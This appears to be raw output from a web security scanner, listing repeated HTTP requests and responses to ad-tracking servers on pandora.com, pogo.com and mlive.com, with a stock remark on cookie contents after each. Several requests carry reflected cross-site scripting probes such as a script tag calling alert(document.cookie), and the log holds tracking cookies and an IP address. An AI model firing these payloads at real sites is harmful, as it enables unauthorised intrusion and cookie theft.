HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUOYaxqp9Z1IP2BTtF0ZY7xajP5TxnZW8sdXNhLHQsMTI5NDUzNjEzNjEyNSxjLDI4MzAxMixwYyw2NTA0NCxhYywxMjg4ODcsbyxUNC1QMCxsLDUxODExCg--/clkurl=http://www.fullsail.edu/index.cfm?fa=landing.GDBSO_1a&mnc=1431&kw=Robot%20NFHC&utm_source=Frontline+Direct&utm_medium=banner&utm_term=Robot%20NFHC&utm_content=GDBSO_1a&utm_campaign=GDBS-O Set-Cookie: id=c653243310000d9|2070351/902302/14983|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Sun, 09 Jan 2011 02:03:13 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm?fpid=10&sp=y&publisher_redirecturl=http://ad.afy11.net/ad?mode=7 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=undefined%7Cundefined%7Cundefined%7C4; rds=undefined%7Cundefined%7Cundefined%7C14983; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 01:48:35 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:48:35 GMT Content-Length: 377
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:01:48 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Sun, 09 Jan 2011 02:01:48 GMT Content-Length: 155
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=C8DDA40C8F4C2B65082C50B995B886FC; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Set-Cookie: evlu=9f6f0757-8308-4d33-b185-c4e0ced3c79a; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:53 GMT; Path=/ Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:01:46 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/js/55290?mpt=3334527&mpvc=&no_cj_c=0&upsid=517004695355 HTTP/1.1 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: no-cache Set-Cookie: svid=517004695355; expires=Wed, 8-Jan-2014 5:33:36 GMT; path=/; domain=.mediaplex.com; P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Location: http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F7440-39748-1543-3%3Fmpt%3D3334527&mpt=3334527&mpvc= Content-Length: 0 Date: Sun, 09 Jan 2011 02:01:54 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6036333&rn=1663368886&c7=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&c4=http%253A%2F%2Fwww.pandora.com%2Fpeople%2F%253Fcf8db%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%2Fscript%25253E09862348e83%253D1&c8=Pandora%20Radio%20-%20Listen%20to%20Free%20Internet%20Radio%2C%2&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sun, 09 Jan 2011 01:22:52 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:52 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p?c1=8&c2=6035179&c3=1&c4=65044&c5=128887&c6=&cv=1.3&cj=1&rn=606698040 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536160339719001&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:22:56 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:22:56 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=268141464&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fhome%2Fhome.jsp%3Ff9258%2522%253E%253Cscript%253Ealert%281%29%253C%2Fscript%253E4225969d669%3D1&d.r=http%3A%2F%2Fburp%2Fshow%2F2 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 09 Jan 2011 01:24:25 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 08-Jan-2013 01:24:25 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pageSection=footer_board HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2111603&Page=&PluID=0&Pos=7971\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5Eeb25Per_Played%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0%5EebVideoStarted%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0&OptOut=0&ebRandom=0.4333476326428354&flv=10.1103&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/cribbage HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/rainy-day-spider-solitaire HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941&type=3&subid=0&tmpid=1826 HTTP/1.1 Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="&partnerId=30&siteID=FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg">&partnerId=30&siteI ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:25:15 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/yahtzee-party HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm HTTP/1.1 Host: r.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=3011330574290390485; rds=undefined%7Cundefined%7Cundefined%7C14983; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rv=1; rrs=undefined%7Cundefined%7Cundefined%7C4;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; F1=BA5Dp0EBAAAABAAAAEAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ACID=Bc330012940999670074; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; ROLL=v5Q2V0cRVUyqcZK!;
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 09 Jan 2011 02:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: /;ord=0846642328? Set-Cookie: C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Set-Cookie: 0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 02:25:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 142
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2f%3bord%3d0846642328%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; F1=BQBFp0EBAAAABAAAAMAAaEA; BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.944664.755399.0XMC Set-Cookie: F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: 72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:09 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=B4hZi0EBAAAABAAAAcAAgEA; BASE=YnQI99MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YM!; ROLL=v5Q2T0cD6byq6qaxJoe34Sv8XRJi49SB7jfC09AP2YSOminn1Wmq7LDEe81vdCC!; C2=y/8JNJpwIg02FAGCdbdBgB7gHw8jGiksjhADgaAc; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
